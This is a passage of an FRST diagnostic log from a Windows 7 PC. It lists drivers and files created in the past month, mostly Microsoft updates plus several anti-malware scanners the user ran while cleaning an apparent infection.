S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [130688 2016-07-22] (Samsung Electronics Co., Ltd.)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 npf; C:\Windows\System32\drivers\npf.sys [36600 2014-08-18] (Riverbed Technology, Inc.)
R0 pavboot; C:\Windows\System32\drivers\pavboot64.sys [33800 2009-06-30] (Panda Security, S.L.)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [164992 2016-07-22] (Samsung Electronics Co., Ltd.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-04-10] ()

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-11 17:40 - 2017-04-11 17:41 - 00027583 _____ C:\Users\KEKLR\Desktop\FRST.txt
2017-04-10 19:32 - 2017-04-10 19:33 - 35207600 _____ (Adlice Software ) C:\Users\KEKLR\Desktop\setup.exe
2017-04-10 19:20 - 2017-04-10 19:25 - 00002386 _____ C:\Users\KEKLR\Desktop\Rkill.txt
2017-04-10 19:18 - 2017-04-10 19:18 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\KEKLR\Desktop\rkill.exe
2017-04-10 19:17 - 2017-04-10 19:17 - 00000000 ____D C:\TDSSKiller_Quarantine
2017-04-10 17:31 - 2017-04-10 19:17 - 00220946 _____ C:\TDSSKiller.3.1.0.12_10.04.2017_17.31.42_log.txt
2017-04-10 17:26 - 2017-04-10 17:26 - 04747704 _____ (AO Kaspersky Lab) C:\Users\KEKLR\Desktop\tdsskiller.exe
2017-04-09 18:58 - 2017-04-10 20:42 - 00028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2017-04-09 18:56 - 2017-04-09 18:57 - 00000000 ____D C:\ProgramData\RogueKiller
2017-04-09 18:55 - 2017-04-10 19:36 - 00000858 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2017-04-09 18:55 - 2017-04-10 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-04-09 18:55 - 2017-04-10 19:36 - 00000000 ____D C:\Program Files\RogueKiller
2017-04-09 18:09 - 2017-04-11 17:34 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-04-09 18:08 - 2017-04-11 17:34 - 00000000 ____D C:\Users\KEKLR\Desktop\mbar
2017-04-09 18:07 - 2017-04-09 18:07 - 16563352 _____ (Malwarebytes Corp.) C:\Users\KEKLR\Desktop\mbar-1.09.3.1001.exe
2017-04-09 17:48 - 2017-04-09 17:57 - 00016594 _____ C:\Users\KEKLR\Desktop\Fixlog.txt
2017-04-09 09:18 - 2017-04-09 09:18 - 00000640 _____ C:\Users\KEKLR\Documents\EEST 4.9.2017.txt
2017-04-08 18:18 - 2017-04-08 18:18 - 06752896 _____ (ESET spol. s r.o.) C:\Users\KEKLR\Desktop\esetonlinescanner_enu.exe
2017-04-08 18:18 - 2017-04-08 18:18 - 00000000 ____D C:\Users\KEKLR\AppData\Local\ESET
2017-04-08 16:52 - 2017-04-08 16:52 - 00029153 _____ C:\ProgramData\agent.1491684753.bdinstall.bin
2017-04-08 16:43 - 2017-04-08 16:43 - 00001106 _____ C:\Users\KEKLR\Desktop\FRST - Shortcut.lnk
2017-04-08 15:31 - 2017-04-08 15:31 - 08465968 _____ C:\Users\KEKLR\Desktop\bitdefender_quickscan.exe
2017-04-08 15:31 - 2017-04-08 15:31 - 00028766 _____ C:\ProgramData\agent.1491679893.bdinstall.bin
2017-04-08 15:27 - 2017-04-08 15:27 - 00028972 _____ C:\ProgramData\agent.1491679676.bdinstall.bin
2017-04-08 15:18 - 2017-04-08 15:18 - 00047906 _____ C:\ProgramData\agent.1491679133.bdinstall.bin
2017-04-08 15:18 - 2017-04-08 15:18 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2017-04-08 15:16 - 2017-04-08 15:16 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Downloads\F-SecureOnlineScanner(1).exe
2017-04-08 15:15 - 2017-04-08 15:17 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Desktop\F-SecureOnlineScanner.exe
2017-04-08 15:14 - 2017-04-08 15:14 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Downloads\F-SecureOnlineScanner (1).exe
2017-04-08 15:13 - 2017-04-08 15:13 - 00524248 _____ (F-Secure Corporation) C:\Users\KEKLR\Downloads\F-SecureOnlineScanner.exe
2017-04-08 15:09 - 2017-04-08 15:26 - 00000000 ____D C:\Users\KEKLR\AppData\Local\FSDART
2017-04-08 15:09 - 2017-04-08 15:09 - 00000000 ____D C:\Users\KEKLR\AppData\Local\F-Secure
2017-04-08 14:47 - 2017-04-08 15:06 - 00064062 _____ C:\Users\KEKLR\Desktop\Addition.txt
2017-04-08 14:43 - 2017-04-08 14:43 - 00001532 _____ C:\Users\KEKLR\Documents\malwarebytes scan 4.8.2017 rootkit.txt
2017-04-08 14:36 - 2017-04-08 14:36 - 00001140 _____ C:\Users\KEKLR\Desktop\SALog 4.8.2017.txt
2017-04-08 14:35 - 2017-04-10 19:30 - 00001140 _____ C:\Users\KEKLR\Desktop\SALog.txt
2017-04-08 14:27 - 2017-04-08 14:27 - 00899584 _____ C:\Users\KEKLR\Downloads\RGSA.exe
2017-04-08 14:26 - 2017-04-08 14:26 - 00899584 _____ C:\Users\KEKLR\Desktop\RGSA.exe
2017-04-08 14:12 - 2017-04-08 14:16 - 00064059 _____ C:\Users\KEKLR\Downloads\Addition.txt
2017-04-08 14:10 - 2017-04-08 15:07 - 00071568 _____ C:\Users\KEKLR\Downloads\FRST.txt
2017-04-08 14:06 - 2017-04-11 17:40 - 00000000 ____D C:\FRST
2017-04-08 14:06 - 2017-04-08 14:10 - 02424832 _____ (Farbar) C:\Users\KEKLR\Downloads\FRST64 (1).exe
2017-04-08 13:59 - 2017-04-08 13:59 - 02424832 _____ (Farbar) C:\Users\KEKLR\Desktop\FRST64.exe
2017-04-08 13:50 - 2017-04-08 13:50 - 00235240 ____H C:\Users\KEKLR\Documents\~WRL0003.tmp
2017-04-08 13:47 - 2017-04-08 13:49 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017 2.txt
2017-04-08 10:51 - 2016-08-22 15:20 - 00332512 _____ (Trend Micro Inc.) C:\Windows\system32\Drivers\tmcomm.sys
2017-04-08 10:39 - 2017-04-08 12:42 - 00000003 _____ C:\Users\KEKLR\Documents\malwarescann 4.8.2017.txt
2017-03-15 19:42 - 2017-03-04 13:24 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 12:39 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-03-15 19:42 - 2017-03-04 04:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-03-15 19:42 - 2017-03-04 04:20 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-03-15 19:42 - 2017-03-04 04:02 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-03-15 19:42 - 2017-03-04 04:01 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-04 04:01 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-04 03:59 - 02895360 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-03-15 19:42 - 2017-03-04 03:52 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-03-15 19:42 - 2017-03-04 03:51 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-03-15 19:42 - 2017-03-04 03:48 - 25746944 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-03-15 19:42 - 2017-03-04 03:46 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-03-15 19:42 - 2017-03-04 03:45 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-03-15 19:42 - 2017-03-04 03:45 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-03-15 19:42 - 2017-03-04 03:44 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-03-15 19:42 - 2017-03-04 03:36 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-03-15 19:42 - 2017-03-04 03:32 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-03-15 19:42 - 2017-03-04 03:31 - 06045696 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-03-15 19:42 - 2017-03-04 03:23 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-04 03:21 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-03-15 19:42 - 2017-03-04 03:16 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-03-15 19:42 - 2017-03-04 03:13 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-03-15 19:42 - 2017-03-04 03:11 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-03-15 19:42 - 2017-03-04 02:57 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-03-15 19:42 - 2017-03-04 02:55 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-03-15 19:42 - 2017-03-04 02:54 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-03-15 19:42 - 2017-03-04 02:52 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-03-15 19:42 - 2017-03-04 02:52 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-04 02:26 - 15259648 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-03-15 19:42 - 2017-03-04 02:25 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-03-15 19:42 - 2017-03-04 02:12 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-03-15 19:42 - 2017-03-04 02:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-03-15 19:42 - 2017-03-04 00:18 - 20281856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-03-15 19:42 - 2017-03-02 14:16 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-03-15 19:42 - 2017-03-02 14:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-03-15 19:42 - 2017-03-02 14:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-03-15 19:42 - 2017-03-02 14:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-03-15 19:42 - 2017-03-02 14:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-03-15 19:42 - 2017-03-02 13:55 - 02287104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-03-15 19:42 - 2017-03-02 13:54 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-03-15 19:42 - 2017-03-02 13:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-03-15 19:42 - 2017-03-02 13:51 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-03-15 19:42 - 2017-03-02 13:50 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-03-15 19:42 - 2017-03-02 13:49 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-03-15 19:42 - 2017-03-02 13:49 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-03-15 19:42 - 2017-03-02 13:41 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-03-15 19:42 - 2017-03-02 13:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-03-15 19:42 - 2017-03-02 13:35 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-03-15 19:42 - 2017-03-02 13:32 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-03-15 19:42 - 2017-03-02 13:31 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-03-15 19:42 - 2017-03-02 13:29 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-03-15 19:42 - 2017-03-02 13:28 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-03-15 19:42 - 2017-03-02 13:22 - 04604416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-03-15 19:42 - 2017-03-02 13:21 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-03-15 19:42 - 2017-03-02 13:19 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-03-15 19:42 - 2017-03-02 13:17 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-03-15 19:42 - 2017-03-02 13:17 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-03-15 19:42 - 2017-03-02 13:11 - 13654528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-03-15 19:42 - 2017-03-02 12:53 - 02767360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 01312768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-03-15 19:42 - 2017-03-02 12:50 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-03-15 19:42 - 2017-02-11 11:58 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-03-15 19:42 - 2017-02-11 11:58 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-03-15 19:42 - 2017-02-10 12:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:32 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-15 19:42 - 2017-02-10 12:17 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-03-15 19:42 - 2017-02-10 10:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-15 19:42 - 2017-02-09 12:36 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:35 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-03-15 19:42 - 2017-02-09 12:35 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-03-15 19:42 - 2017-02-09 12:35 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-03-15 19:42 - 2017-02-09 12:33 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 12:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:19 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-03-15 19:42 - 2017-02-09 12:19 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-03-15 19:42 - 2017-02-09 12:16 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
